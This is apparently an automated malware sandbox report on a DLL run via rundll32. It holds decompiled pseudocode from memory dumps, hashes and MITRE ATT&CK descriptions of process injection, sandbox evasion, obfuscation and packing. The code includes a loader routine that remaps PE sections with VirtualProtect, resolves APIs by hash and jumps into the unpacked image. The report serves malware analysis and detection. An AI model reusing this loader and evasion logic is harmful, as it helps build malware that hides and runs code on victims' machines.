					E7332F620( &(_t535[0x38]), 0);
					E7332F620( &(_t535[0x168]), 0x1c);
					_t535[0x58] = E7332F558( &(_t535[0x168]), 0);
					_t400 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0xc));
					_t535[0x48] =  *(_t400 + 0xc);
					_t535[0x60] =  *(_t400 + 0x10);
					goto L5;
					L6:
					_t384 = 0;
					do {
						if(( *(_t529 + 0x24) & 0x20000000) == 0) {
							goto L13;
						}
						_t513 =  *((intOrPtr*)(_t529 + 0xc)) + _t535[0x58] +  *((intOrPtr*)(_t529 + 8));
						_t496 = E73332F94(0xa5eabdf8, 0x22dc1034, _t279, _t279);
						if(_t496 == 0) {
							L10:
							_t456 = _t535[0x50];
							_t497 =  *((intOrPtr*)(_t529 + 0xc));
							_t498 = _t497 + _t456;
							_t500 =  *((intOrPtr*)(_t529 + 8));
							_t535[0x28] = _t498;
							_t499 = _t498 + _t500;
							_t363 =  *(_t535[0x58]) - _t456 - _t497 - _t500 -  *((intOrPtr*)(_t535[0x58] + 0xc));
							_t535[0x24] = _t529;
							_t535[0x20] =  *(_t535[0x48] + 0x30);
							if((_t499 & 0x00000003) == 0) {
								L12:
								_t535[0x1c] = _t363;
								_t535[0x18] = _t499;
								E7332F8C4( &(_t535[0xc]), E7332F568( &(_t535[8])) + 0x14);
								_t369 = E7332F558( &(_t535[0xc]), E7332F568( &(_t535[8])) + 0xffffffec);
								_t462 = 5;
								_t279 = memcpy(_t369,  &(_t535[0x18]), _t462 << 2);
								_t535 =  &(_t535[0xc]);
								_t535[4] = _t535[4] + 1;
								goto L13;
							} else {
								goto L11;
							}
							do {
								L11:
								_t499 = _t499 + 1;
								_t363 = _t363 - 1;
							} while ((_t499 & 0x00000003) != 0);
							goto L12;
						}
						_t279 =  *_t496(0xffffffff, _t513, 0, _t535[0x60], 0x1c, 0);
						if(0 < 0) {
							goto L13;
						}
						goto L10;
						L13:
						_t384 = _t384 + 1;
						_t529 = _t529 + 0x28;
					} while (_t384 < _t535[0x5c]);
					L14:
					_t280 = _t535[4];
					_t535[0x44] = _t280;
					if(_t280 <= 1) {
						L21:
						if(_t535[0x44] <= 0) {
							L24:
							_t281 = _t535[0x48];
							_t556 = _t281 - _t535[0x60];
							if(_t281 != _t535[0x60]) {
								_t535[0x48] =  *_t281;
								E7332F6F0( &(_t535[8]));
								L5:
								_t277 =  *(_t535[0x48] + 0x18);
								_t535[0x50] = _t277;
								_t535[4] = 0;
								_t379 =  *((intOrPtr*)(_t277 + 0x3c)) + _t277;
								E7332F620( &(_t535[0xc]), 0);
								_t279 =  *(_t379 + 6) & 0x0000ffff;
								_t535[0x5c] = _t279;
								_t529 = _t379 + ( *(_t379 + 0x14) & 0x0000ffff) + 0x18;
								if(_t279 <= 0) {
									goto L14;
								}
								goto L6;
							}
							E7332F6F0( &(_t535[8]));
							E7332F6F0( &(_t535[0x164]));
							E7332F620( &(_t535[0x48]), 0);
							_t535[0x18] = 0;
							E7332F620( &(_t535[0x20]), 0);
							_push(0xa5eabdf8);
							_t289 = E73331DD0(0xa5eabdf8);
							_t290 = E73331388( &(_t535[0x154]), _t517, _t556);
							_push(_t290);
							_push(_t290);
							E73331D08( &(_t535[0x164]), 0xa5eabdf8);
							_t518 =  &(_t535[0x178]);
							E7332D0D0( &(_t535[0x178]) - 0x24,  &(_t535[0x178]), _t535[0x15c]);
							_push(0x80);
							_push(0);
							E73335C40( &(_t535[0x114]), _t556, _t535[0x184], 1);
							E73335C74( &(_t535[0x180]) - 0x7c, _t556,  &(_t535[0x180]), 0);
							_push(_t289);
							E73338D74( &(_t535[0xe4]),  &(_t535[0x180]), 2);
							E7332F6F0( &(_t535[0x180]));
							_t557 = _t535[0x114];
							if(_t535[0x114] != 0) {
								E7332BC00( &(_t535[0x110]));
							}
							E7332D098( &(_t535[0x104]));
							E7332D098(_t518);
							E7332D098( &(_t535[0x15c]));
							E7332D098( &(_t535[0x154]));
							E73339058( &(_t535[0xdc]), 0xffffffff);
							_t535[0x118] = _t535[0xf0];
							E7332F6B4( &(_t535[0x11c]), _t557,  &(_t535[0xf4]));
							_push(1);
							E7333901C( &(_t535[0x11c]));
							_t381 = 0;
							_t535[0x64] = 0;
							_t535[0x60] = 0;
							do {
								_t535[0x58] = E7332F558( &(_t535[0x38]), _t535[0x60]);
								_t535[0x70] = E7332F568( &(_t535[0x44]));
								_t519 =  *(0x7333bce0 + _t381 * 4);
								_t531 = E73338FE8( &(_t535[0xf4]), _t519, _t519);
								if(_t531 == 0) {
									goto L42;
								}
								_t508 = E73338754( &(_t535[0x11c]), _t519,  *_t531);
								_t532 =  *_t531;
								while(_t532 ==  *_t508) {
									_t508 = _t508 + 8;
									__eflags = _t508;
								}
								_t315 =  *_t508;
								_t535[0x74] = _t315;
								_t535[0x78] = _t315 - _t532;
								if(_t381 != 0) {
									L38:
									_t535[0x68] = E7332F568( &(_t535[0x44]));
									_t535[0x6c] = _t519;
									E7332F578( &(_t535[0x4c]), _t562, _t532, _t535[0x78]);
									_t319 = E7332F568( &(_t535[0x44]));
									_t487 = _t535[0x58];
									_t563 = _t319 -  *((intOrPtr*)(_t487 + 4));
									if(_t319 <=  *((intOrPtr*)(_t487 + 4))) {
										E7332F8C4( &(_t535[0x20]), E7332F568( &(_t535[0x1c])) + 8);
										E7332F558( &(_t535[0x20]), E7332F568( &(_t535[0x1c])) + 0xfffffff8);
										asm("movsd");
										asm("movsd");
										_t535[0x18] = _t535[0x18] + 1;
										__eflags = _t381 - 0x1d;
										if(__eflags == 0) {
											_t228 =  &(_t535[0x44]); // 0x2c
											E733330A4(_t535[0x58], _t228, __eflags,  &(_t535[0x18]));
										}
										goto L42;
									}
									E7332F8C4( &(_t535[0x48]), _t535[0x70]);
									E733330A4(_t535[0x58],  &(_t535[0x44]), _t563,  &(_t535[0x18]));
									E7332F8DC( &(_t535[0x44]), _t563);
									E7332F8DC( &(_t535[0x1c]), _t563);
									_t381 = _t381 - 1;
									_t334 = _t535[0x64] + 1;
									_t535[0x60] = _t535[0x60] + 0x14;
									_t535[0x18] = 0;
									_t535[0x64] = _t334;
									if(_t334 == _t535[0x30]) {
										break;
									}
									goto L42;
								}
								E733390A8( &(_t535[0x134]), _t519);
								_t535[0x5c] = _t532;
								while(1) {
									_t336 = _t535[0x5c];
									_t562 =  *_t336 - 0xb8;
									if( *_t336 == 0xb8) {
										break;
									}
									_t490 = _t535[0x5c] + E73339070( &(_t535[0x138]), __eflags, _t535[0x74]);
									_t535[0x5c] = _t490;
									__eflags = _t490 -  *_t508;
									if(__eflags < 0) {
										continue;
									}
									L37:
									E7332F6F0( &(_t535[0x144]));
									E7332F6F0( &(_t535[0x134]));
									goto L38;
								}
								 *0x7333d2e8 =  *((intOrPtr*)(_t336 + 1));
								goto L37;
								L42:
								_t381 = _t381 + 1;
							} while (_t381 < 0x1e);
							E7332F6F0( &(_t535[0x11c]));
							E73338DD4(_t381,  &(_t535[0xd8]));
							E7332F6F0( &(_t535[0x1c]));
							E7332F6F0( &(_t535[0x44]));
							E7332F6F0( &(_t535[0x34]));
							goto L44;
						}
						_t533 = 0;
						_t382 = 0;
						do {
							_t341 = E7332F558( &(_t535[0xc]), _t382);
							_t517 = _t341;
							E7332F8C4( &(_t535[0x38]), E7332F568( &(_t535[0x34])) + 0x14);
							_t347 = E7332F558( &(_t535[0x38]), E7332F568( &(_t535[0x34])) + 0xffffffec);
							_t451 = 5;
							memcpy(_t347, _t341, _t451 << 2);
							_t535 =  &(_t535[0xc]);
							_t533 = _t533 + 1;
							_t382 = _t382 + 0x14;
							_t535[0x30] = _t535[0x30] + 1;
						} while (_t533 < _t535[0x44]);
						goto L24;
					}
					_t535[0x4c] = 1;
					_t534 = 0x14;
					do {
						_t62 = _t534 - 0x14; // 0x0
						_t383 = E7332F558( &(_t535[0xc]), _t62);
						_t455 = E7332F558( &(_t535[0xc]), _t534);
						_t517 =  *_t383;
						_t352 =  *_t455;
						if(_t352 >= _t517 && _t352 <= _t383[1] + _t517) {
							_t383[1] =  *((intOrPtr*)(_t455 + 0x10)) - _t517;
						}
						_t534 = _t534 + 0x14;
						_t354 = _t535[0x4c] + 1;
						_t535[0x4c] = _t354;
					} while (_t354 < _t535[0x44]);
					_t535[0x44] = _t535[4];
					goto L21;
				}
			}

0x733314e4
0x733314eb
0x733314ee
0x733314f5
0x73331c77
0x73331c77
0x733314fb
0x73331506
0x73331a45
0x73331a49
0x00000000
0x73331cc8
0x73331a4f
0x73331a52
0x73331a55
0x73331a5f
0x73331a6e
0x73331a70
0x73331a77
0x73331c61
0x73331c63
0x73331c66
0x73331c6a
0x00000000
0x73331c6a
0x73331a86
0x73331a91
0x73331a98
0x73331a9b
0x73331a9d
0x73331aa0
0x73331aa3
0x73331aa9
0x73331ab7
0x73331ac7
0x73331aec
0x73331afd
0x73331b00
0x73331b02
0x73331b66
0x73331b69
0x73331b69
0x73331b6b
0x73331b6e
0x73331b72
0x73331b72
0x73331b76
0x00000000
0x00000000
0x73331b83
0x73331b89
0x73331bbd
0x73331bc3
0x73331bc5
0x73331c94
0x73331c9c
0x73331c9f
0x73331ca1
0x73331cb8
0x73331cb8
0x73331ca3
0x73331ca7
0x73331cac
0x73331cac
0x73331cba
0x73331cc0
0x73331bdf
0x73331bdf
0x73331be1
0x73331be1
0x73331be3
0x73331be3
0x73331be8
0x00000000
0x00000000
0x73331bea
0x73331beb
0x73331bee
0x73331bf1
0x00000000
0x00000000
0x73331bfd
0x73331c00
0x73331c02
0x73331c19
0x73331c19
0x73331c04
0x73331c08
0x73331c0d
0x73331c0d
0x73331c26
0x73331c29
0x73331c32
0x73331c35
0x73331c58
0x73331c5c
0x00000000
0x73331c5c
0x73331c3d
0x73331c3d
0x73331c49
0x73331c4c
0x73331c55
0x00000000
0x73331c55
0x73331bcb
0x73331bdb
0x73331bdb
0x73331bdd
0x00000000
0x00000000
0x73331bd3
0x73331bd5
0x73331bd5
0x00000000
0x73331bdb
0x73331b8b
0x73331b93
0x73331bb3
0x73331b95
0x73331b95
0x73331b9d
0x73331ba6
0x73331ba6
0x73331b9d
0x00000000
0x73331b93
0x73331b04
0x73331b0b
0x00000000
0x00000000
0x73331b18
0x73331b1e
0x73331b23
0x73331b2a
0x73331b2e
0x73331b43
0x73331b45
0x73331b47
0x73331b4d
0x73331b5b
0x73331b5b
0x73331b61
0x00000000
0x73331b61
0x00000000
0x00000000
0x00000000
0x00000000
0x73331aab
0x73331aab
0x73331aab
0x73331aac
0x73331aaf
0x73331ab3
0x00000000
0x73331ac9
0x73331acc
0x73331acf
0x73331ad8
0x73331adb
0x73331adc
0x73331ade
0x00000000
0x73331519
0x7333151b
0x73331520
0x7333152b
0x73331539
0x7333154c
0x73331559
0x73331562
0x73331566
0x7333156a
0x733315b2
0x733315b2
0x733315b4
0x733315bb
0x00000000
0x00000000
0x733315d4
0x733315dc
0x733315e0
0x733315f5
0x733315f9
0x733315fd
0x73331606
0x7333160c
0x7333160f
0x73331613
0x7333161b
0x7333161d
0x73331621
0x73331628
0x73331631
0x73331631
0x73331635
0x7333164a
0x73331660
0x7333166d
0x7333166e
0x7333166e
0x73331670
0x00000000
0x00000000
0x00000000
0x00000000
0x7333162a
0x7333162a
0x7333162a
0x7333162b
0x7333162c
0x00000000
0x7333162a
0x733315ef
0x733315f3
0x00000000
0x00000000
0x00000000
0x73331674
0x73331674
0x73331675
0x73331678
0x73331682
0x73331682
0x73331686
0x7333168d
0x733316e8
0x733316ed
0x73331740
0x73331740
0x73331744
0x73331748
0x73331572
0x73331575
0x7333157a
0x73331580
0x73331583
0x7333158a
0x7333158e
0x73331595
0x7333159e
0x733315a2
0x733315a6
0x733315ac
0x00000000
0x00000000
0x00000000
0x733315ac
0x73331752
0x7333175e
0x73331769
0x73331770
0x73331779
0x73331783
0x73331784
0x73331792
0x73331797
0x73331798
0x733317a5
0x733317aa
0x733317bc
0x733317c1
0x733317c6
0x733317d8
0x733317ea
0x733317ef
0x733317fa
0x73331801
0x73331806
0x7333180e
0x73331817
0x73331817
0x73331823
0x7333182a
0x73331836
0x73331842
0x73331850
0x73331861
0x73331868
0x7333186d
0x73331876
0x7333187b
0x7333187d
0x73331881
0x73331885
0x73331892
0x7333189f
0x733318a3
0x733318b7
0x733318bb
0x00000000
0x00000000
0x733318d0
0x733318d2
0x733318da
0x733318d7
0x733318d7
0x733318d7
0x733318de
0x733318e0
0x733318e6
0x733318ec
0x73331948
0x73331951
0x73331955
0x73331962
0x7333196b
0x73331970
0x73331974
0x73331977
0x733319d8
0x733319ee
0x733319f9
0x733319fa
0x733319fb
0x733319ff
0x73331a02
0x73331c82
0x73331c85
0x73331c85
0x00000000
0x73331a02
0x73331981
0x73331991
0x7333199a
0x733319a3
0x733319ac
0x733319ad
0x733319ae
0x733319b3
0x733319bb
0x733319c3
0x00000000
0x00000000
0x00000000
0x733319c5
0x733318f5
0x733318fa
0x733318fe
0x733318fe
0x73331902
0x73331905
0x00000000
0x00000000
0x73331926
0x73331928
0x7333192c
0x7333192e
0x00000000
0x00000000
0x73331930
0x73331937
0x73331943
0x00000000
0x73331943
0x7333190a
0x00000000
0x73331a08
0x73331a08
0x73331a09
0x73331a19
0x73331a25
0x73331a2e
0x73331a37
0x73331a40
0x00000000
0x73331a40
0x733316ef
0x733316f1
0x733316f3
0x733316f8
0x733316fd
0x73331710
0x73331726
0x7333172f
0x73331730
0x73331730
0x73331732
0x73331733
0x73331736
0x7333173a
0x00000000
0x733316f3
0x7333168f
0x73331699
0x7333169a
0x7333169a
0x733316a7
0x733316b3
0x733316b5
0x733316b7
0x733316bb
0x733316cb
0x733316cb
0x733316d2
0x733316d5
0x733316d6
0x733316da
0x733316e4
0x00000000
0x733316e4

Memory Dump Source

Source File: 00000002.00000002.617918728.0000000073321000.00000020.00020000.sdmp, Offset: 73320000, based on PE: true

Associated: 00000002.00000002.617906797.0000000073320000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.617950082.000000007333A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.617974649.000000007333D000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.618004135.000000007333F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1ce1dc23d536406fc7c602782767b32ed96ea13c0d01f748080a1b2db76d3317
Instruction ID: 751dd4c2f66c41cbb9919177c41cbdd10031bd9b21d5a680d0d2579322bf1d7d
Opcode Fuzzy Hash: 1ce1dc23d536406fc7c602782767b32ed96ea13c0d01f748080a1b2db76d3317
Instruction Fuzzy Hash: A93280719083448FD725EF24C880B9EBBF4FF95301F94892DE596872A0EB74E946CB52

Uniqueness

Uniqueness Score: -1.00%

Function 73326DC8, Relevance: .0, Instructions: 36
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E73326DC8() {

				 *0x7333d280 = GetUserNameW;
				 *0x7333D284 = MessageBoxW;
				 *0x7333D288 = GetLastError;
				 *0x7333D28C = CreateFileA;
				 *0x7333D290 = DebugBreak;
				 *0x7333D294 = FlushFileBuffers;
				 *0x7333D298 = FreeEnvironmentStringsA;
				 *0x7333D29C = GetConsoleOutputCP;
				 *0x7333D2A0 = GetEnvironmentStrings;
				 *0x7333D2A4 = GetLocaleInfoA;
				 *0x7333D2A8 = GetStartupInfoA;
				 *0x7333D2AC = GetStringTypeA;
				 *0x7333D2B0 = HeapValidate;
				 *0x7333D2B4 = IsBadReadPtr;
				 *0x7333D2B8 = LCMapStringA;
				 *0x7333D2BC = LoadLibraryA;
				 *0x7333D2C0 = OutputDebugStringA;
				return 0x7333d280;
			}

0x73326dd9
0x73326de1
0x73326de4
0x73326df3
0x73326df6
0x73326e05
0x73326e08
0x73326e17
0x73326e1a
0x73326e29
0x73326e2c
0x73326e3b
0x73326e3e
0x73326e4d
0x73326e50
0x73326e5f
0x73326e62
0x73326e65

Memory Dump Source

Source File: 00000002.00000002.617918728.0000000073321000.00000020.00020000.sdmp, Offset: 73320000, based on PE: true

Associated: 00000002.00000002.617906797.0000000073320000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.617950082.000000007333A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.617974649.000000007333D000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.618004135.000000007333F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e8978f7a256b4fd74a322d6034cc5f37e44426c665c45dae9c5281523a6d7366
Instruction ID: d059dd2642a4a78ce92f04b91ca360ad72d8f68cde8e214ed39a2b2039324539
Opcode Fuzzy Hash: e8978f7a256b4fd74a322d6034cc5f37e44426c665c45dae9c5281523a6d7366
Instruction Fuzzy Hash: AA1112BAA15600CFC368DF0AD194A917BF9FB8C310721C19AD82D8B365D738D845DF54

Uniqueness

Uniqueness Score: -1.00%

Function 7332BC00, Relevance: .0, Instructions: 16
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E7332BC00(intOrPtr* __ecx) {
				void* _t1;
				intOrPtr* _t4;

				_t4 = __ecx;
				_t1 = E7332C33C(__ecx);
				if(_t1 != 0) {
					L4:
					return _t1;
				} else {
					_t1 = E73332F8C(0xa5eabdf8, 0x2c2324e8);
					if(_t1 == 0) {
						 *_t4 = 0;
						goto L4;
					} else {
						_push( *_t4);
						asm("int3");
						return _t1;
					}
				}
			}

0x7332bc01
0x7332bc03
0x7332bc0a
0x7332bc29
0x7332bc2a
0x7332bc0c
0x7332bc16
0x7332bc1d
0x7332bc23
0x00000000
0x7332bc1f
0x7332bc1f
0x7332bc21
0x7332bc22
0x7332bc22
0x7332bc1d

Memory Dump Source

Source File: 00000002.00000002.617918728.0000000073321000.00000020.00020000.sdmp, Offset: 73320000, based on PE: true

Associated: 00000002.00000002.617906797.0000000073320000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.617950082.000000007333A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.617974649.000000007333D000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.618004135.000000007333F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 229d0e70dd984517c4ff88a566391a3803afd3012da0cf9cedecb5fa3dd55369
Instruction ID: 6c5829d57d37a669c30df798acf88e077c3604c94751ab1957e6f675eed0e3ad
Opcode Fuzzy Hash: 229d0e70dd984517c4ff88a566391a3803afd3012da0cf9cedecb5fa3dd55369
Instruction Fuzzy Hash: EFD0127210025267EF351735FE00B15EBED4FC6153F5849565A41670A9CFA680524060

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: rundll32.exe PID: 5272 Parent PID: 5340 rundll32.exeCOMMON

Executed Functions

Function 023D2213, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 169
memoryCOMMON

Download Yara Rule

C-Code - Quality: 42%

			E023D2213(long __ebx, long __edi, void* __esi, intOrPtr* _a4) {
				char _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				char _v44;
				intOrPtr* _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				void* _v72;
				char* _v76;
				int _v80;
				long _v84;
				long _v88;
				DWORD* _v92;
				intOrPtr _v96;
				int _v100;
				intOrPtr* _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				void* _v120;
				intOrPtr _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				char* _v140;
				intOrPtr _v144;
				intOrPtr _v148;
				intOrPtr _v152;
				intOrPtr _v156;
				intOrPtr _v160;
				intOrPtr _v164;
				int _v168;
				char* _v172;
				intOrPtr _v176;
				intOrPtr _v180;
				char _v184;
				intOrPtr* _t136;
				int _t143;
				int _t151;
				int _t155;
				intOrPtr _t170;
				int _t177;
				void* _t226;
				intOrPtr _t229;
				intOrPtr _t234;
				void* _t236;
				intOrPtr* _t240;
				intOrPtr _t247;
				intOrPtr _t251;
				DWORD* _t264;
				void* _t268;
				intOrPtr* _t271;
				intOrPtr* _t272;

				_t136 = _a4;
				_v20 = 0;
				_t236 =  *((intOrPtr*)(_t136 + 0x40));
				 *0x23d4418 = 1;
				asm("movaps xmm0, [0x23d3010]");
				asm("movups [0x23d4428], xmm0");
				_v48 = _t136;
				_v52 =  *((intOrPtr*)(_t136 + 0x64));
				_v56 =  *((intOrPtr*)(_v48 + 8));
				_v184 = _t236;
				_v60 =  *((intOrPtr*)(_v48 + 0x50));
				_v180 = _v52;
				_v176 = 4;
				_v172 =  &_v20;
				_v64 =  *((intOrPtr*)(_t136 + 0x60));
				_v68 = 4;
				_v72 = _t236;
				_v76 =  &_v20;
				_t143 = VirtualProtect(__esi, __edi, __ebx, _t264); // executed
				_v80 = _t143;
				_v184 = _v72;
				_v180 = 0;
				_v176 =  *((intOrPtr*)(_v48 + 0x64));
				_v84 = 0x400;
				_v88 = 2;
				_v92 =  &_v20;
				_v96 = 0;
				E023D2569();
				E023D1D28(_v72,  *((intOrPtr*)(_v48 + 0xc)), _v56);
				E023D2569( *((intOrPtr*)(_v48 + 0xc)), 0, _v56);
				_t151 = VirtualProtect(_v72, 0x400, 2, _v92); // executed
				_t271 = _t268 - 0x88;
				_t226 = _v72;
				_t251 =  *((intOrPtr*)(_t226 + 0x3c));
				_v100 = _t151;
				_v104 = _v72 + 0x3c;
				_v108 = _t226;
				_v112 = _t251;
				if(_t251 != 0) {
					_v108 = _v72 + (_v112 + 0x0000ffff & 0x0000ffff) + 1;
				}
				_v144 = _v108;
				if(_v60 != 0) {
					_v148 = 0;
					_v152 = _v144 + 0x18 + ( *(_v144 + 0x14) & 0x0000ffff);
					while(1) {
						_t170 = _v152;
						_v160 = _t170;
						_t247 = _v160;
						_v184 = _v72 +  *((intOrPtr*)(_t247 + 0xc));
						_v180 =  *((intOrPtr*)(_t247 + 8));
						_v176 =  *((intOrPtr*)(0x23d4418 + (( *(_t170 + 0x24) >> 0x0000001e & 0x00000001) << 4) + ( *(_t170 + 0x24) >> 0x1f << 3) + (( *(_t170 + 0x24) >> 0x0000001d & 0x00000001) << 2)));
						_v172 =  &_v20;
						_v164 = _v148;
						_t177 = VirtualProtect(??, ??, ??, ??); // executed
						_t271 = _t271 - 0x10;
						_t234 = _v164 + 1;
						_v168 = _t177;
						_v148 = _t234;
						_v152 = _v160 + 0x28;
						if(_t234 == _v60) {
							goto L9;
						}
					}
				}
				L9:
				 *_t271 = _v72;
				_v124 = _v72 +  *((intOrPtr*)(_v48 + 0x24));
				_t155 = DisableThreadLibraryCalls(??);
				_t272 = _t271 - 4;
				_t229 =  *_v104;
				_v156 = _t155;
				_v116 = _t229;
				_v120 = _v72;
				if(_t229 != 0) {
					_v120 = _v72 + (_v116 + 0x0000ffff & 0x0000ffff) + 1;
				}
				_t240 = _v48;
				_v44 =  *((intOrPtr*)(_t240 + 0x20));
				_v40 =  *((intOrPtr*)(_t240 + 0x18));
				_v36 =  *((intOrPtr*)(_t240 + 0x34));
				_v32 =  *((intOrPtr*)(_t240 + 0x30));
				_v28 =  *_t240;
				_v24 = _v124;
				 *_t272 = _t240;
				_v184 = 0;
				_v180 = 0x74;
				_v128 =  *((intOrPtr*)(_v120 + 0x28));
				_v132 = 0;
				_v136 = 0x74;
				_v140 =  &_v44;
				E023D2569();
				if(_v128 != 0) {
					_t272 =  *((intOrPtr*)( &_v44 + 0x10));
					goto __eax;
				}
				return 1;
			}

0x023d221f
0x023d222d
0x023d2234
0x023d2237
0x023d2241
0x023d2248
0x023d2252
0x023d2258
0x023d2261
0x023d226a
0x023d226d
0x023d2273
0x023d2277
0x023d227f
0x023d2283
0x023d2286
0x023d2289
0x023d228c
0x023d228f
0x023d22a9
0x023d22af
0x023d22b2
0x023d22ba
0x023d22be
0x023d22c1
0x023d22c4
0x023d22c7
0x023d22ca
0x023d22e6
0x023d2303
0x023d2328
0x023d232a
0x023d2333
0x023d2336
0x023d2340
0x023d2343
0x023d2346
0x023d2349
0x023d234c
0x023d23a4
0x023d23a4
0x023d254a
0x023d2550
0x023d244d
0x023d2453
0x023d249f
0x023d249f
0x023d24bc
0x023d24e2
0x023d24f0
0x023d24f3
0x023d24f7
0x023d24fb
0x023d2502
0x023d2508
0x023d250a
0x023d251c
0x023d2524
0x023d252a
0x023d2530
0x023d2536
0x00000000
0x00000000
0x023d253c
0x023d249f
0x023d245b
0x023d2469
0x023d2471
0x023d2474
0x023d2476
0x023d247c
0x023d2488
0x023d248e
0x023d2491
0x023d2494
0x023d238a
0x023d238a
0x023d23d8
0x023d23de
0x023d23e4
0x023d23ea
0x023d23f0
0x023d23f5
0x023d23fb
0x023d23fe
0x023d2401
0x023d2409
0x023d2411
0x023d2414
0x023d2417
0x023d241d
0x023d2423
0x023d242e
0x023d2362
0x023d2368
0x023d2368
0x023d23c5

APIs

VirtualProtect.KERNELBASE ref: 023D228F
VirtualProtect.KERNELBASE ref: 023D2328

Strings

t, xrefs: 023D2409

Memory Dump Source

Source File: 00000005.00000002.617041603.00000000023D0000.00000040.00000001.sdmp, Offset: 023D0000, based on PE: true

Similarity

API ID: ProtectVirtual
String ID: t
API String ID: 544645111-2238339752
Opcode ID: f1d2094d293b4c54b3c3782cb553065b00885a8ba79930040f6f5fb5622ebb82
Instruction ID: 88ddd65cdb795be07c79397fa7062c4d311ac0217fb755cb0ba0b18e7f6a0697
Opcode Fuzzy Hash: f1d2094d293b4c54b3c3782cb553065b00885a8ba79930040f6f5fb5622ebb82
Instruction Fuzzy Hash: 9D819BB5E042088FCB04CF99D590A9EFBF1FF88310F65856AE958AB352D730A945CF91

Uniqueness

Uniqueness Score: -1.00%

Function 023D2439, Relevance: 1.6, APIs: 1, Instructions: 72memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE ref: 023D2508

Memory Dump Source

Source File: 00000005.00000002.617041603.00000000023D0000.00000040.00000001.sdmp, Offset: 023D0000, based on PE: true

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: cf425164b5b6cc3cc3398d4da486e2b18b879a6ca9ff257ec1a0878e66a0d898
Instruction ID: 623a80deb0cd9da4a1f36a4e9a3471ba9dc619691940ac909ff724c87862e0f1
Opcode Fuzzy Hash: cf425164b5b6cc3cc3398d4da486e2b18b879a6ca9ff257ec1a0878e66a0d898
Instruction Fuzzy Hash: F131E9B6E002288FDB14CF69C98069DB7F1BF88304F558699D94DA7306D731AE91CF81

Uniqueness

Uniqueness Score: -1.00%

Function 023D1D89, Relevance: 1.4, APIs: 1, Instructions: 107memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE ref: 023D1EA8

Memory Dump Source

Source File: 00000005.00000002.617041603.00000000023D0000.00000040.00000001.sdmp, Offset: 023D0000, based on PE: true

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 0b9b42ba2fdb08c7cefa25f605df8f332aac007ccc48bea5617a17140e49e517
Instruction ID: b72075de98c12e584a1532448dd4de6417d8d55c74e7efb1077cb2e9989d8e3a
Opcode Fuzzy Hash: 0b9b42ba2fdb08c7cefa25f605df8f332aac007ccc48bea5617a17140e49e517
Instruction Fuzzy Hash: EC41C0B5E0421A8FDB04DFA8D4906AEBBF1BF48714F19852AE848AB340D775A840CF94

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.
Tactics:	Defense Evasion
Data Sources:	DLL monitoring, Loaded DLLs, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
